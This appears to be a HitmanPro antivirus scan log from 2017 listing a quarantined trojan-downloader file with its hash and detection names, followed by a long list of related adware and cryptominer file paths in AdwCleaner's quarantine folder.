   C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
      Size . . . . . . . : 27.136 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 5.9
      SHA-256  . . . . . : EA7702197F353023091C654CE9D54CE8DB169B874D9C948A0D34CD9BF1FD2397
    > Bitdefender  . . . : Gen:Variant.MSILPerseus.34918
    > Kaspersky  . . . . : Trojan-Downloader.MSIL.Agent.alqa
    > HitmanPro  . . . . : Troj/MSIL-HOX
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.9s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.8s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.8s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.7s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.7s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.1s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
